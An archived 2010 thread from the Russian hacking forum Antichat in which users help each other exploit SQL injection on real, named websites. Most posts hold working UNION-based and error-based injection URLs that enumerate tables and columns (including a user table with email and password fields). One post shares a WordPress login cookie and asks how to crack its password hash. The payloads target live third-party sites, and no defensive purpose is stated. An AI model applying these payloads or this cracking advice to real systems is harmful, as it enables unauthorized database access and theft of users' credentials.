ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.03.2010, 02:12
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Sharsky
Jokester, вывело только 0 и больше ничего =(
Серьёзно? Тебе-же давали линк:
https://forum.antichat.ru/thread104591.html
И ты сказал, что прочёл материал.
Я там видимо по японски писал, соре 
|
|
|
05.03.2010, 02:28
|
|
Новичок
Регистрация: 03.03.2010
Сообщений: 9
Провел на форуме:
29833
Репутация:
0
|
|
Прочитал пару раз вашу тему и вот что у меня получилось:
Код:
http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns+where+column_name=0x70616765730d0a--
Выбрал таблицу pages и там одну из колонок, вотвывожу и ничего нет. |
|
|
|
05.03.2010, 02:40
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от Sharsky
Прочитал пару раз вашу тему и вот что у меня получилось:
Код:
http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns+where+column_name=0x70616765730d0a--
Выбрал таблицу pages и там одну из колонок, вотвывожу и ничего нет.
Код:
http://www.sixls.com/news.php?id=-3+union+select+1,2,count(column_name)+from+information_schema.columns+where+table_name=0x70616765730d0a+--+
Нету там колонок, и после where не column_name, а table_name
|
|
|
|
05.03.2010, 11:06
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Вот такой вопросик:
попалась стандартная уязвимость на asp:
http://www.site1.com/detail.asp?sid=1485+or+1=@@version--
нормально выводится версия операционки, дальше пытаюсь вытащить названия столбцов из information_schema вот так:
http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables)--
показывает, что есть таблица 'Photos', дальше через not in:
http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables where table_name not in ('Photos'))--
вылетает ошибка " Line 1: Incorrect syntax near 'Photos' "
пробую так:
http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables where table_name not in ("Photos"))--
вылетает: " Invalid column name 'Photos'. "
затестил через <>, заменив название таблицы через хекс так:
http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables where table_name<>0x50686f746f73)--
сработало, но больше одного названия вытащить не получается.
Вопрос: как можно полистать названия?
|
|
|
|
05.03.2010, 12:37
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Sharsky
Прочитал пару раз вашу тему и вот что у меня получилось:
вот вывод из той самой таблицы, что там могло не получаться?
http://www.sixls.com/news.php?id=-3+union+select+1,page_id,3+from+pages--
Сообщение от Strilo4ka
Jokester хочу твой ответ.
Я бы с удовольствием ответил, но боюсь, что то, что ты пишешь понимаешь только ты сам
Ну или я туповат, я честно пытался понять, но безуспешно.
mr.celt
С линком будет проще
|
|
|
|
05.03.2010, 14:22
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от Jokester
С линком будет проще
отправил в личку
|
|
|
|
05.03.2010, 17:33
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Strilo4ka, не обижайся, но без разделительных знаков понять то, что ты пишешь, трудновато.
Ты не так меня понял. Запрос на сервер можно послать как угодно, другое дело - сделать это через браузер. В браузере через формы с методом POST данные передаются "как есть", тоесть без какого-либо декодирования.
|
|
|
|
05.03.2010, 19:22
|
|
Участник форума
Регистрация: 30.09.2009
Сообщений: 148
Провел на форуме:
11581319
Репутация:
241
|
|
есть строчка такого рода:
Код:
wordpress_test_cookie=WP+Cookie+check;%20wordpressuser_4660020b7a87d7619827cd8098d2d654=Spider;%20wordpresspass_4660020b7a87d7619827cd8098d2d654=febc22cb6c4923d9271a857fc9ea2f7d
как отсюда выдернуть кукисы или мд5 хеш пароля?мб онлайн дешифратор какой-то? |
|
|
|
05.03.2010, 19:24
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,group_concat%28column_name% 29,3%20from%20information_schema.columns%20where%2 0table_name=0x75736572--
выдает id,name,email,pass,session_id,session_date,nick
Нашел Sql
Но при этом когда пишу http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,2,3%20from%20user-- Выдет пустую страницу
В чем может быть косяк?
|
|
|
|
05.03.2010, 19:52
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от Assembler
http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,group_concat%28column_name% 29,3%20from%20information_schema.columns%20where%2 0table_name=0x75736572--
выдает id,name,email,pass,session_id,session_date,nick
Нашел Sql
Но при этом когда пишу http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,2,3%20from%20user-- Выдет пустую страницу
В чем может быть косяк?
http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,count(*),3+from+user
Таблица пустая
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1956032){kind=avatar}
Похожие темы
Линейный вид
